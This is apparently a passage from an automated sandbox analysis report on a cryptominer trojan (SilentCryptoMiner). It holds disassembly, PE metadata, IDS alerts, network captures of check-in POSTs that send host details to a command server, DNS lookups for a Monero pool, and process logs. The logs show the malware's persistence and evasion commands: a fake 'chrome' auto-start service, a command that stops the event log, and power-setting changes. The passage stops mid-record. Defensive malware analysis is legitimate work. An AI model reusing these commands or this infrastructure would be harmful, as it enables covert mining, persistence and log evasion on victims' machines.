                                                                      nop word ptr [eax+eax+00000000h]
                                                                      mov ecx, 000003E8h
                                                                      inc ecx
                                                                      call esi
                                                                      xor eax, eax
                                                                      dec eax
                                                                      cmpxchg dword ptr [esi], edi
                                                                      sete bl
                                                                      je 00007F98A0E57CA7h
                                                                      dec eax
                                                                      cmp edi, eax
                                                                      jne 00007F98A0E57C89h
                                                                      dec eax
                                                                      mov edi, dword ptr [00006E90h]
                                                                      mov eax, dword ptr [edi]
                                                                      cmp eax, 01h
                                                                      jne 00007F98A0E57CAEh
                                                                      mov ecx, 0000001Fh
                                                                      call 00007F98A0E5E7B4h
                                                                      jmp 00007F98A0E57CC9h
                                                                      cmp dword ptr [edi], 00000000h
                                                                      je 00007F98A0E57CABh
                                                                      mov byte ptr [00280279h], 00000001h
                                                                      jmp 00007F98A0E57CBBh
                                                                      mov dword ptr [edi], 00000001h
                                                                      dec eax
                                                                      mov ecx, dword ptr [00006E7Ah]
                                                                      dec eax
                                                                      mov edx, dword ptr [00006E7Bh]
                                                                      call 00007F98A0E5E7ABh
                                                                      mov eax, dword ptr [edi]
                                                                      cmp eax, 01h
                                                                      jne 00007F98A0E57CBBh
                                                                      dec eax
                                                                      mov ecx, dword ptr [00006E50h]
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x94980x3c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2830000x180.pdata
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2860000x78.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x80a00x28.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x84100x138.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x96300x158.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x6e660x700042b8d53c7132825837df8ffa19fd2afdFalse0.5160435267857143data6.192903409851674IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x1be00x1c00121a3532afaafe9a81937bdf9609741fFalse0.4624720982142857data4.717763516481226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xa0000x2782c00x277600c1b50fa360640b33a30e9a9bb63b5379unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .pdata0x2830000x1800x200f5fbf02aac615f058b32af2eeedd82d8False0.5data3.121262937174934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .00cfg0x2840000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .tls0x2850000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .reloc0x2860000x780x20032539c6431988892e67ceceb60b6f77aFalse0.224609375data1.412764374634762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      DLLImport
                                                                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-26T22:32:03.575000+02002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.4615951.1.1.153UDP
                                                                      2024-10-26T22:32:03.575000+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.449730141.94.96.713333TCP
                                                                      2024-10-26T22:32:05.503960+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.44973183.217.209.23580TCP
                                                                      2024-10-26T22:33:04.673917+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.45553883.217.209.23580TCP
                                                                      2024-10-26T22:34:05.476290+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.45577183.217.209.23580TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 26, 2024 22:32:03.590365887 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:32:03.595824957 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:32:03.595922947 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:32:03.596088886 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:32:03.602082968 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:32:04.427258968 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:32:04.476094961 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:32:04.545197964 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:32:04.607198954 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:32:04.617132902 CEST4973180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:32:04.622747898 CEST804973183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:32:04.623034000 CEST4973180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:32:04.623718023 CEST4973180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:32:04.629374981 CEST804973183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:32:04.629440069 CEST4973180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:32:04.634844065 CEST804973183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:32:05.503671885 CEST804973183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:32:05.503959894 CEST4973180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:32:05.509767056 CEST804973183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:32:05.509861946 CEST4973180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:32:16.479747057 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:32:16.522927046 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:32:27.456773996 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:32:27.538604021 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:32:53.439541101 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:32:53.491771936 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:33:03.565129995 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:33:03.616770029 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:33:03.742333889 CEST5553880192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:33:03.747780085 CEST805553883.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:33:03.747875929 CEST5553880192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:33:03.749325037 CEST5553880192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:33:03.754714012 CEST805553883.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:33:03.757630110 CEST5553880192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:33:03.763010979 CEST805553883.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:33:04.672992945 CEST805553883.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:33:04.673917055 CEST5553880192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:33:04.681075096 CEST805553883.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:33:04.681873083 CEST5553880192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:33:14.246421099 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:33:14.288616896 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:33:24.284085035 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:33:24.335576057 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:33:40.400054932 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:33:40.444996119 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:33:52.775243998 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:33:52.820017099 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:33:56.116389990 CEST333349730141.94.96.71192.168.2.4
                                                                      Oct 26, 2024 22:33:56.163906097 CEST497303333192.168.2.4141.94.96.71
                                                                      Oct 26, 2024 22:34:04.515335083 CEST5577180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:34:04.520947933 CEST805577183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:34:04.521198034 CEST5577180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:34:04.521198034 CEST5577180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:34:04.526700974 CEST805577183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:34:04.526927948 CEST5577180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:34:04.532489061 CEST805577183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:34:05.407638073 CEST805577183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:34:05.476289988 CEST5577180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:34:05.548330069 CEST805577183.217.209.235192.168.2.4
                                                                      Oct 26, 2024 22:34:05.548558950 CEST5577180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:34:05.666621923 CEST5577180192.168.2.483.217.209.235
                                                                      Oct 26, 2024 22:34:05.672466993 CEST805577183.217.209.235192.168.2.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 26, 2024 22:32:03.575000048 CEST6159553192.168.2.41.1.1.1
                                                                      Oct 26, 2024 22:32:03.585268974 CEST53615951.1.1.1192.168.2.4
                                                                      Oct 26, 2024 22:32:47.249464989 CEST5363396162.159.36.2192.168.2.4
                                                                      Oct 26, 2024 22:32:47.901947975 CEST53642031.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 26, 2024 22:32:03.575000048 CEST192.168.2.41.1.1.10x7f4cStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 26, 2024 22:32:03.585268974 CEST1.1.1.1192.168.2.40x7f4cNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                      Oct 26, 2024 22:32:03.585268974 CEST1.1.1.1192.168.2.40x7f4cNo error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                                      Oct 26, 2024 22:32:03.585268974 CEST1.1.1.1192.168.2.40x7f4cNo error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                      Oct 26, 2024 22:32:03.585268974 CEST1.1.1.1192.168.2.40x7f4cNo error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                      • 83.217.209.235
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.44973183.217.209.235804040C:\Windows\System32\svchost.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 26, 2024 22:32:04.623718023 CEST233OUTPOST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
                                                                      Accept: */*
                                                                      Connection: close
                                                                      Content-Length: 482
                                                                      Content-Type: application/json
                                                                      Host: 83.217.209.235
                                                                      User-Agent: cpp-httplib/0.12.6
                                                                      Oct 26, 2024 22:32:04.629440069 CEST482OUTData Raw: 7b 22 69 64 22 3a 22 77 76 72 79 69 6b 6d 6d 68 73 6b 6d 68 78 7a 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 42 5a 55 4f 4d 22
                                                                      Data Ascii: {"id":"wvryikmmhskmhxzl","computername":"051829","username":"SYSTEM","gpu":"BZUOM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","r
                                                                      Oct 26, 2024 22:32:05.503671885 CEST267INHTTP/1.1 200 OK
                                                                      Date: Sat, 26 Oct 2024 20:32:05 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      X-Robots-Tag: noindex, nofollow
                                                                      X-Powered-By: PHP/8.2.12
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
                                                                      Data Ascii: {"response":"ok"}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.45553883.217.209.235804040C:\Windows\System32\svchost.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 26, 2024 22:33:03.749325037 CEST233OUTPOST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
                                                                      Accept: */*
                                                                      Connection: close
                                                                      Content-Length: 497
                                                                      Content-Type: application/json
                                                                      Host: 83.217.209.235
                                                                      User-Agent: cpp-httplib/0.12.6
                                                                      Oct 26, 2024 22:33:03.757630110 CEST497OUTData Raw: 7b 22 69 64 22 3a 22 77 76 72 79 69 6b 6d 6d 68 73 6b 6d 68 78 7a 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 42 5a 55 4f 4d 22
                                                                      Data Ascii: {"id":"wvryikmmhskmhxzl","computername":"051829","username":"SYSTEM","gpu":"BZUOM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","r
                                                                      Oct 26, 2024 22:33:04.672992945 CEST251INHTTP/1.1 200 OK
                                                                      Date: Sat, 26 Oct 2024 20:33:04 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      X-Robots-Tag: noindex, nofollow
                                                                      X-Powered-By: PHP/8.2.12
                                                                      Content-Length: 2
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Data Raw: 7b 7d
                                                                      Data Ascii: {}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.45577183.217.209.235804040C:\Windows\System32\svchost.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 26, 2024 22:34:04.521198034 CEST233OUTPOST /yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php HTTP/1.1
                                                                      Accept: */*
                                                                      Connection: close
                                                                      Content-Length: 498
                                                                      Content-Type: application/json
                                                                      Host: 83.217.209.235
                                                                      User-Agent: cpp-httplib/0.12.6
                                                                      Oct 26, 2024 22:34:04.526927948 CEST498OUTData Raw: 7b 22 69 64 22 3a 22 77 76 72 79 69 6b 6d 6d 68 73 6b 6d 68 78 7a 6c 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 42 5a 55 4f 4d 22
                                                                      Data Ascii: {"id":"wvryikmmhskmhxzl","computername":"051829","username":"SYSTEM","gpu":"BZUOM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","r
                                                                      Oct 26, 2024 22:34:05.407638073 CEST251INHTTP/1.1 200 OK
                                                                      Date: Sat, 26 Oct 2024 20:34:05 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                      X-Robots-Tag: noindex, nofollow
                                                                      X-Powered-By: PHP/8.2.12
                                                                      Content-Length: 2
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Data Raw: 7b 7d
                                                                      Data Ascii: {}


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe"
                                                                      Imagebase:0x7ff64fe00000
                                                                      File size:2'625'024 bytes
                                                                      MD5 hash:226EB2BBB97ABBCABBD5BF08418CBE9C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:16:32:01
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\sc.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\sc.exe delete "chrome"
                                                                      Imagebase:0x7ff780af0000
                                                                      File size:72'192 bytes
                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\sc.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\sc.exe create "chrome" binpath= "C:\ProgramData\MicrosoftEdge\Edgee.exe" start= "auto"
                                                                      Imagebase:0x7ff780af0000
                                                                      File size:72'192 bytes
                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\sc.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                      Imagebase:0x7ff780af0000
                                                                      File size:72'192 bytes
                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\sc.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\sc.exe start "chrome"
                                                                      Imagebase:0x7ff780af0000
                                                                      File size:72'192 bytes
                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\ProgramData\MicrosoftEdge\Edgee.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\ProgramData\MicrosoftEdge\Edgee.exe
                                                                      Imagebase:0x7ff6d96d0000
                                                                      File size:2'625'024 bytes
                                                                      MD5 hash:226EB2BBB97ABBCABBD5BF08418CBE9C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 79%, ReversingLabs
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\powercfg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                      Imagebase:0x7ff784930000
                                                                      File size:96'256 bytes
                                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:16:32:02
                                                                      Start date:26/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
